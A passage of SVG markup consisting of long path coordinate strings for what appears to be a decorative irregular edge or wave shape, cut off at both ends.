4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path 